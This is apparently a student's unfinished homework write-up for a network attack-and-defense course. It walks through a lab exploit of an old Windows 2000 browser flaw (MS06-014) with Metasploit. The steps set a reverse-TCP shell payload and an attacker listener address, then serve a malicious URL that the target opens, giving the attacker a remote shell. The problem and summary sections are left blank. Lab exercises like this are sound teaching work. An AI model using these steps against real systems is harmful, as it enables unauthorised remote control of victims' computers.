20253919 2025-2026-2 《网络攻防实践》第11周作业

一、实践内容

本次包含三项网络安全实操任务：

• Web 浏览器渗透攻击：借助 Metasploit 的 MS06-014 模块配置载荷与参数生成恶意网页木马，靶机浏览器访问该 URL 触发攻击，攻击机通过建立的远程会话远程操控靶机执行命令。
• 网页木马取证分析：从 start.html 逐级获取后续文件地址，对地址做小写 32 位 MD5 哈希，按哈希值下载对应文件；网页 / 脚本持续解密，二进制文件开展反汇编或动态调试，直至全部文件分析完毕。
• 浏览器渗透攻防对抗：攻击方构造两款不同浏览器漏洞的混淆渗透代码，打包为钓鱼链接通过邮件发送；防守方提取链接、解混淆还原原始攻击代码，定位目标浏览器及对应漏洞。

二、实践过程

kali ip地址为 192.168.200.21
win2k地址为192.168.200.9

（一）web浏览器渗透攻击

1. 使用Metasploit中的MS06-014渗透攻击模块
   msfconsole

search MS06-014
   
2. 设置payload
   set payload windows/shell/reverse_tcp
   
3. 设置服务器地址和URL参数
   set LHOST 192.168.200.21
   
4. 发动攻击,生成url：http://192.168.200.21:8080/U3olD0qa
   exploit
   
5. 在靶机打开网址
   
6. 进一步发动攻击，验证已经成功

ipconfig```
![image](https://img2024.cnblogs.com/blog/3775189/202606/3775189-20260615111908534-965858802.png)

# 三、学习中遇到的问题及解决
- 问题1：
- 问题1解决方案：


# 四、实践总结